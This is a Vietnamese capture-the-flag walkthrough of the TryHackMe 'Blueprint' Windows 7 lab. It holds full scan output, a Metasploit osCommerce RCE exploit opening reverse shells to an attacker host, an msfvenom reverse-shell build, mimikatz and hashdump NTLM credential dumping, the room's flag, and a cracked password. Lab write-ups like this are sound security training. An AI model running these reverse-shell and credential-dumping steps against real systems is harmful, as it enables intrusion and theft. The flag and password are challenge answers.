Blueprint
Hack into this Windows machine and escalate your privileges to Administrator.
November 4, 2025
•
August 30, 2025
•
Easy
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~]
└─$ rustscan -a blueprint.thm -- -sV -sC
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 124 Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 124 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 124 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Supported Methods: GET HEAD POST
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Bad request!
445/tcp open microsoft-ds syn-ack ttl 124 Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 124 MariaDB 10.3.23 or earlier (unauthorized)
8080/tcp open http syn-ack ttl 124 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
| http-methods:
| Supported Methods: OPTIONS GET HEAD POST TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
49152/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49160/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windowsTừ kết quả scan, chúng ta thấy trên port 80 là Microsoft IIS 7.5 nhưng chỉ trả về lỗi 404. Port 443 và 8080 chạy Apache 2.4.23 với PHP 5.6.28 và OpenSSL 1.0.2h, trong đó port 8080 công khai directory listing chứa oscommerce-2.3.4. Ngoài ra, port 3306 mở dịch vụ MariaDB nhưng chưa xác thực khi chưa có credentials. Hệ thống này là Windows 7 Home Basic SP1, với nhiều dịch vụ Windows RPC và SMB (port 135, 139, 445, 49152,…).
HTTP 80
Directory Enumeration
Trước hết chúng ta chạy một content scan trên website http bằng công cụ ffuf với một wordlist nhỏ dành cho directory.
Vì server đang chạy Microsoft IIS httpd, chúng ta cũng sử dụng thêm file iis.txt để scan.
Tuy nhiên, kết quả không cho ra phát hiện nào hữu ích.
SMB 139, 445
Tiếp theo, chúng ta enumerate dịch vụ SMB bằng một số script của nmap.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p139,445 -sV --script=smb-enum* -v blueprint.thm
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Service Info: Host: BLUEPRINT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-enum-groups:
| BLUEPRINT\TelnetClients (RID: 1001): <empty>
| Builtin\Administrators (RID: 544): Administrator
| Builtin\Users (RID: 545): Lab
| Builtin\Guests (RID: 546): Guest
| Builtin\Performance Monitor Users (RID: 558): <empty>
| Builtin\Performance Log Users (RID: 559): <empty>
| Builtin\Distributed COM Users (RID: 562): <empty>
| Builtin\IIS_IUSRS (RID: 568): <empty>
|_ Builtin\Event Log Readers (RID: 573): <empty>
| smb-enum-shares:
| account_used: guest
| \\10.201.73.128\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.201.73.128\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.201.73.128\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \\10.201.73.128\Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.201.73.128\Windows:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ
| smb-enum-domains:
| BLUEPRINT
| Groups: TelnetClients
| Users: Administrator, Guest, Lab
| Creation time: 2009-07-14T04:34:12
| Passwords: min length: n/a; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: Administrators, Distributed COM Users, Event Log Readers, Guests, IIS_IUSRS, Performance Log Users, Performance Monitor Users, Users
| Users: n/a
| Creation time: 2009-07-14T04:34:12
| Passwords: min length: n/a; min age: n/a days; max age: 42 days; history: n/a passwords
|_ Account lockout disabled
| smb-enum-users:
| BLUEPRINT\Administrator (RID: 500)
| Description: Built-in account for administering the computer/domain
| Flags: Normal user account, Password does not expire
| BLUEPRINT\Guest (RID: 501)
| Description: Built-in account for guest access to the computer/domain
| Flags: Normal user account, Password not required, Password does not expire
| BLUEPRINT\Lab (RID: 1000)
| Full name: Steve
|_ Flags: Normal user accountKết quả cho thấy có 2 share thú vị cho phép user guest quyền đọc.
/Users
Sau khi liệt kê đệ quy toàn bộ nội dung, trong share User không có gì đáng chú ý.
┌──(kali㉿kali)-[~]
└─$ smbclient -U 'guest' -c 'recurse;ls' //blueprint.thm/Users
Password for [WORKGROUP\guest]:
. DR 0 Fri Apr 12 05:36:40 2019
.. DR 0 Fri Apr 12 05:36:40 2019
Default DHR 0 Tue Jul 14 14:17:20 2009
desktop.ini AHS 174 Tue Jul 14 11:41:57 2009
Public DR 0 Tue Jul 14 11:41:57 2009
\Default
. DHR 0 Tue Jul 14 14:17:20 2009
.. DHR 0 Tue Jul 14 14:17:20 2009
AppData DHn 0 Tue Jul 14 09:37:05 2009
Desktop DR 0 Tue Jul 14 09:04:25 2009
Documents DR 0 Tue Jul 14 11:53:55 2009
Downloads DR 0 Tue Jul 14 09:04:25 2009
Favorites DR 0 Tue Jul 14 09:04:25 2009
Links DR 0 Tue Jul 14 09:04:25 2009
Music DR 0 Tue Jul 14 09:04:25 2009
NTUSER.DAT AHSn 262144 Mon Jan 16 05:39:21 2017
NTUSER.DAT.LOG AH 1024 Tue Apr 12 09:28:04 2011
NTUSER.DAT.LOG1 AH 197632 Fri Apr 12 05:49:06 2019
NTUSER.DAT.LOG2 AH 0 Tue Jul 14 09:03:40 2009
NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf AHS 65536 Tue Jul 14 11:34:22 2009
NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Tue Jul 14 11:34:22 2009
NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Tue Jul 14 11:34:22 2009
Pictures DR 0 Tue Jul 14 09:04:25 2009
Saved Games Dn 0 Tue Jul 14 09:04:25 2009
Videos DR 0 Tue Jul 14 09:04:25 2009
...
7863807 blocks of size 4096. 4762515 blocks available/Windows
┌──(kali㉿kali)-[~]
└─$ smbclient -U 'guest' -c 'recurse;ls' //blueprint.thm/Windows
Password for [WORKGROUP\guest]:
NT_STATUS_ACCESS_DENIED listing \*Với share /Windows, chúng ta lại không có quyền để liệt kê bên trong.
HTTPS 443
Ở dịch vụ HTTPS cổng 443, ta thấy server đang chạy osCommerce. Đây là một nền tảng e-commerce miễn phí và mã nguồn mở, cho phép người dùng tự xây dựng và quản lý cửa hàng trực tuyến của mình. osCommerce được phát triển dựa trên PHP và MySQL.
/oscommerce-2.3.4/
Khi truy cập /oscommerce-2.3.4/, chúng ta có thể thấy giao diện quản trị cơ bản của nó.
/oscommerce-2.3.4/catalog/
Trong thư mục /oscommerce-2.3.4/catalog/ là giao diện chính của hệ thống.
Lúc này, chúng ta bắt đầu tìm kiếm các lỗ hổng và exploit công khai bằng searchsploit:
Phiên bản osCommerce này tồn tại lỗ hổng Remote Code Execution (RCE). May mắn là đã có sẵn một module trong Metasploit để khai thác lỗ hổng này.
Shell as SYSTEM
msf > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set rhosts blueprint.thm
rhosts => blueprint.thm
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set rport 443
rport => 443
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set uri /oscommerce-2.3.4/catalog/install/
uri => /oscommerce-2.3.4/catalog/install/
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set lhost 10.17.21.52
lhost => 10.17.21.52
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set lport 4242
lport => 4242
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.17.21.52:4242
[*] Sending stage (40004 bytes) to 10.201.73.128
[*] Meterpreter session 1 opened (10.17.21.52:4242 -> 10.201.73.128:49355) at 2025-08-30 15:24:41 +0700
meterpreter > getuid
Server username: SYSTEMSau khi thiết lập reverse shell thành công, chúng ta đã chiếm được quyền SYSTEM, vì vậy không cần thực hiện leo quyền nữa. Tuy nhiên, do đang dùng PHP payload nên khả năng thao tác trên target còn khá hạn chế.
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: The "priv" extension is not supported by this Meterpreter type (php/windows)
[-] The "priv" extension is supported by the following Meterpreter payloads:
[-] - windows/x64/meterpreter*
[-] - windows/meterpreter*
meterpreter >
Background session 1? [y/N]
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > search post windows hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/credentials/mcafee_vse_hashdump . normal No McAfee Virus Scan Enterprise Password Hashes Dump
1 post/windows/gather/credentials/domain_hashdump . normal No Windows Domain Controller Hashdump
2 post/windows/gather/credentials/mssql_local_hashdump . normal No Windows Gather Local SQL Server Hash Dump
3 post/windows/gather/hashdump . normal No Windows Gather Local User Account Password Hashes (Registry)
4 post/windows/gather/smart_hashdump . normal No Windows Gather Local and Domain Controller Account Password Hashes
Interact with a module by name or index. For example info 4, use 4 or use post/windows/gather/smart_hashdump
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > use 3
msf post(windows/gather/hashdump) > set session 1
session => 1
msf post(windows/gather/hashdump) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_unload_key, stdapi_sys_config_getprivs, stdapi_sys_config_getsid, stdapi_sys_config_steal_token, stdapi_sys_process_attach, stdapi_registry_create_key, stdapi_registry_enum_key_direct, stdapi_railgun_api, stdapi_railgun_api_multi, stdapi_railgun_memread, stdapi_railgun_memwrite, stdapi_registry_check_key_exists, stdapi_registry_set_value_direct, stdapi_registry_delete_key, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct
[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:53:in `run'
[*] Post module execution completedroot.txt.txt
Ở bước này, chúng ta có thể tìm file root.txt.txt trong Desktop của Administrator và đọc nội dung.
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 35184372097024 dir 211641814984-06-26 08:07:54 +0700 Administrator
All Users
040555/r-xr-xr-x 35184372097024 dir 169794966134-07-08 16:14:40 +0700 Default
Default User
040777/rwxrwxrwx 35184372097024 dir 202807130441-11-10 08:53:52 +0700 DefaultAppPool
040777/rwxrwxrwx 35184372097024 dir 202806952692-07-10 05:15:50 +0700 Lab
040555/r-xr-xr-x 17592186048512 dir 169793697254-09-05 19:29:09 +0700 Public
100666/rw-rw-rw- 747324309678 fil 169793697254-09-05 19:29:09 +0700 desktop.ini
meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 211641782047-10-12 02:03:20 +0700 AppData
Application Data
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Contacts
Cookies
040555/r-xr-xr-x 0 dir 214344273165-05-09 17:45:44 +0700 Desktop
040555/r-xr-xr-x 17592186048512 dir 211641783000-06-29 23:21:19 +0700 Documents
040555/r-xr-xr-x 0 dir 211641857720-07-18 00:08:52 +0700 Downloads
040555/r-xr-xr-x 0 dir 211641783136-08-06 05:49:36 +0700 Favorites
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Links
Local Settings
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Music
My Documents
100666/rw-rw-rw- 3377699721314304 fil 211641781503-05-17 00:10:12 +0700 NTUSER.DAT
100666/rw-rw-rw- 281474976776192 fil 211641797971-09-22 15:12:29 +0700 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
100666/rw-rw-rw- 2251799814209536 fil 211641797971-09-22 15:12:29 +0700 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer000000000000000000
01.regtrans-ms
100666/rw-rw-rw- 2251799814209536 fil 211641797971-09-22 15:12:29 +0700 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer000000000000000000
02.regtrans-ms
NetHood
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Pictures
PrintHood
Recent
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Saved Games
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Searches
SendTo
Start Menu
Templates
040555/r-xr-xr-x 0 dir 211641783000-06-29 23:21:19 +0700 Videos
100666/rw-rw-rw- 1125899907104768 fil 211641781503-05-17 00:10:12 +0700 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 211641782047-10-12 02:03:20 +0700 ntuser.dat.LOG2
100666/rw-rw-rw- 85899345940 fil 211641782047-10-12 02:03:20 +0700 ntuser.ini
meterpreter > ls Desktop
Listing: Desktop
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1211180777754 fil 211641783000-06-29 23:21:19 +0700 desktop.ini
100666/rw-rw-rw- 158913789989 fil 214344271123-10-28 16:41:29 +0700 root.txt.txt
meterpreter > cd Desktop
meterpreter > cat root.txt.txt
THM{aea1e3ce6fe7f89e10cea833ae009bee}Dumping Lab’s NTLM Hash
Tiếp theo, chúng ta thử chuyển công cụ mimikatz lên target để dump hash.
meterpreter > cd "C:\Windows\Temp"
meterpreter > upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
[*] Uploading : /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -> mimikatz.exe
[*] Uploaded -1.00 B of 1.03 MiB (0.0%): /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -> mimikatz.exe
[*] Completed : /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -> mimikatz.exe
meterpreter > shell
Process 7300 created.
Channel 0 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\Temp>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Terminate channel 0? [y/N] y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>Nhưng trong quá trình chạy lại gặp lỗi timeout, không thể thực thi được. Nguyên nhân có thể do hạn chế của PHP payload, vì thế chúng ta nên nâng cấp sang payload windows/meterpreter để thoát khỏi giới hạn này.
Đầu tiên, chúng ta tạo payload bằng msfvenom, sau đó upload nó thông qua session Meterpreter hiện có.
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.21.52 LPORT=4444 --platform windows -a x86 -f exe -o rev.exe
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exemeterpreter > cd "C:\Windows\Temp"
meterpreter > upload ~/Desktop/rev.exe
[*] Uploading : /home/kali/Desktop/rev.exe -> rev.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /home/kali/Desktop/rev.exe -> rev.exe
[*] Completed : /home/kali/Desktop/rev.exe -> rev.exe
meterpreter > shell
Process 8188 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\Temp>.\rev.exe
Terminate channel 1? [y/N] y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>Khi thử chạy, vẫn gặp tình trạng timeout. Thay vì chạy payload thông qua PowerShell, chúng ta chạy trực tiếp file executable ngay trong Meterpreter.
meterpreter > cd C:/Windows/Temp
meterpreter > execute -f rev.exe
Process 9680 created.Sau khi có Meterpreter chuẩn, chúng ta có thể load module kiwi để dump toàn bộ NTLM hashes.
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.17.21.52
LHOST => 10.17.21.52
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.17.21.52:4444
[*] Sending stage (177734 bytes) to 10.201.73.128
[*] Meterpreter session 1 opened (10.17.21.52:4444 -> 10.201.73.128:49419) at 2025-08-30 16:06:27 +0700
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd lsadump::sam
Domain : BLUEPRINT
SysKey : 147a48de4a9815d2aa479598592b086f
Local SID : S-1-5-21-3130159037-241736515-3168549210
SAMKey : 3700ddba8f7165462130a4441ef47500
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 549a1bcb88e35dc18c7a0b0168631411
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : Lab
Hash NTLM: 30e87bf999828446a1c1209ddde4c450Hay một cách khác là sử dụng command hashdump, không cần phải load kiwi.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::Cuối cùng, chúng ta crack các hash này bằng công cụ CrackStation để tìm ra password.
Và mật khẩu gốc là googleplus.